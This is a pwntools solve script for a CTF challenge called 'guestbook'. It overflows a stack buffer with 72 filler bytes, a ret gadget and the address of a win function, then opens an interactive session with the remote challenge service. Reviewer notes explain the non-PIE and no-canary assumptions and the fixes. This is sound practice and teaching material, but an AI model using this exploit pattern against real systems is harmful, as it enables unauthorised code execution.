#!/usr/bin/env python3
"""CTF solve script for the `guestbook` challenge (ret2win via stack overflow).

The service asks for a name and the reply overruns a stack buffer, so the
saved return address can be replaced with the address of the binary's `win`
function.

Reviewer notes (defensive reading):
  * The hard-coded absolute addresses below only stay valid if the target is
    not position-independent -- presumably a non-PIE build; confirm with
    checksec.
  * Reaching the saved return address with plain filler implies no stack
    canary is checked on this path -- inferred from the payload layout, not
    verified here.
  * The fix on the service side is a length-bounded read into the name
    buffer; stack protector and PIE/ASLR are the build-time hardening that
    would invalidate this fixed-address payload.
"""
from pwn import *

# Optional local setup, left disabled as in the original:
# context.binary = elf = ELF('guestbook',checksec=False)

# Filler bytes needed before the saved return address is reached.
OFFSET_TO_RIP = 72

# Address of a bare `ret` instruction (located with ROPgadget).
# NOTE(review): presumably inserted to keep the stack 16-byte aligned when
# `win` is entered -- confirm against the binary.
RET_GADGET = 0x40101A

# Address of the `win` function (taken from `nm`).
WIN_ADDR = 0x40121B

# Local run against the binary instead of the remote service:
# io = process(elf.path)
io = remote("offsec.m0lecon.it", 13599)

# Wait for the name prompt before sending anything.
io.recvuntil(b"name?\n")

filler = b"A" * OFFSET_TO_RIP
chain = p64(RET_GADGET) + p64(WIN_ADDR)
payload = flat(filler, chain)

# send() appends no newline; the payload goes out exactly as built.
io.send(payload)
io.interactive()